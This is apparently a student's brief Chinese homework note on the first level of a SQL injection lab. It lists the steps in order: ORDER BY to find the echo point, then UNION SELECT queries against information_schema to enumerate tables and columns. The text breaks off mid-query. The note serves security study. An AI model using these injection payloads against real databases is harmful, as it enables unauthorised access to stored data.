SQL课堂作业
第一关使用order by 查找回显点使用union select 1,2, table_name from information_schema.tables where table_schema=database()查询当前数据库下都user表接着使用union select 1,2, column_name from information_schema.columns where tabl
1